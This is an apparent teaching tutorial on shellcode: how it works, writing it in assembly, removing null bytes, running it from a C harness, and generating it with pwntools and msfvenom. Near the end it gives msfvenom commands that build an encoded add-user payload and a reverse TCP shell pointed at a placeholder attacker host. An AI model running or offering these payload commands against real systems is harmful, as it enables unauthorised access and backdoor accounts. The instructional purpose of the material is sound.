A shellcode is a machine dependent code that can be executed by the CPU directly w/o the need of Function Parameters any compiling, assembling or linking. The typical goal of a shellcode is to create a shell preferably with root privileges, that is why it is named as shellcode. The shellcode is stored in a process address space at some convenient place, which can be
- Code Section
- Process Stack
- As part of input buffer
- In some environment variable
- Process Heap
To execute a shellcode, all you need to do is simply transfer control of execution to that address.
A good hacker always write his/her own shellcodes, and the task is not much tricky for assembly guys. The obvious drawback is that you can write shellcode for the architecture that you are working on. What if you want the shellcode for other architectures like arm64, powerpc or android. Moreover, sometimes it becomes a bit tricky if you are not good at assembly language programming. So being newbies the simplest option is downloading shellcode for your specific hardware and operating system from some Internet archives like
- Can be written in C, but better to write in assembly.
- Must know the underlying system calls (execve(), open(), read(), write(), dup2(), setresuid() and others). For example, place the string /bin/bash in memory and pass it as argument to syscall() system call
- Must have a clear understanding of architecture's function calling conventions.
- Write assembly code and create object file using following command
nasm -f elf64 <filename>.nasm
- Check out the opcodes in the object file
objdump -M intel -D <filename>.o
- If opcode of an instruction contain NULL bytes '\x00', then that assembly instruction must be rewritten(avoid them). For example
MOV rax, 0 (b8 00 00 00 00)
XOR rax, rax (48 31 c0)
- Finally extract the opcode from the object file, which is you shellcode.
Once you have written your shellcode. You can use it. Mostly this shellcode is made a part of the string which is given as input to a vulnerable program for a buffer overflow attack. But today we will run our shellcodes as a stand alone C program.
- The general format of a C program using a shellcode is shown below
#include <stdio.h>
#include <string.h>
char *code = "some kind of shellcode";
int main()
printf("len:%d bytes\n", strlen(code));
int (*foo)() = (int(*)())code;
return 0;
Null bytes (also known as null terminators or zero bytes) are binary values with all bits set to zero (ASCII value 0). In the context of shellcode and exploit development, the presence of null bytes in the shellcode can lead to unintended behavior and can pose challenges for successful exploitation.
- Many programming languages and libraries interpret null bytes as string terminators.
- If a null byte appears in the middle of the shellcode, it may prematurely terminate the shellcode or any surrounding data, causing the payload to be incomplete or incorrect.
- Null bytes can interfere with C string functions like strcpy, strcat, and strlen, which expect null-terminated strings.
- If shellcode contains null bytes, these functions might not work as expected, leading to unexpected behavior or crashes.
- Null bytes can lead to memory corruption if they are misinterpreted by the program. - For example, a null byte might terminate a buffer earlier than expected, causing buffer overflows or unexpected data manipulation.
Check out the exitcode01.nasm
- Compilation and extracting opcode (shellcode)
nasm -felf64 exitcode.nasm
ld exitcode.o
objdump -M -d intel ./a.out
objdump -M intel exitcode02.o -d | grep "^ " | cut -f2
- Now run exitcode.c where shellcode is injected.
Pwntools which is a CTF(Capture the flag) framework and exploit development library written in python. It is designed for rapid prototyping and development and intended to make exploit writing as simple as possible.
sudo apt-get install python3-dev python3-pip
sudo pip install pwntools
We will focus on one of its sub-module called shellcraft, which allows us to write assembly code similar to what we can do with NASM, but using python. So you don't have to know much about assembly to make it work.
msfvenom -h
msfvenom -l payloads
msfvenom -l payloads | grep linux/x86
msfvenom -p linux/x86/adduser --payload-options
- Metasploit Framework is an open source pentesting framework used for
- Vulnerability research
- Writing, testing and using exploit code
- Shellcode development
- This comes pre-installed with Kali Linux. There are many interfaces to it like, msfconsole, msfcli, msfgui, msfweb, and armitage.
- Submodule msfvenom, to generate predefined shellcodes suitable for many platforms and architectures. Some self contained payloads that do a specific task are available in /usr/share/metasploit-framework/modules/singles/ directory.
- msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.
- Additional benefits of using msfvenom are like avoiding bad characters like null bytes and generating the shellcode in various file formats to be used in C, Python, or C# programs.
- Meterpreter, which is a post exploitation tool and is used for in-memory dll/so-injection in the memory space of the exploited process without having to create a new process.
- The command below creates shell code for creating a user having username mehar and password 123 and the -b option avoids the null bytes and -e uses encoder for shellcode and -f c means can inject shellcode in c program.
msfvenom -p linux/x86/adduser PASS=123 USER=mehar -f c -b '\00' -e shikata_ga_nai
// shellcode generated by msfvenom for adding a user
- Creates a shellcode for reverse tcp shell on some other machne to hack the machine by creating a shell on the victim machine.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f elf -o shell.elf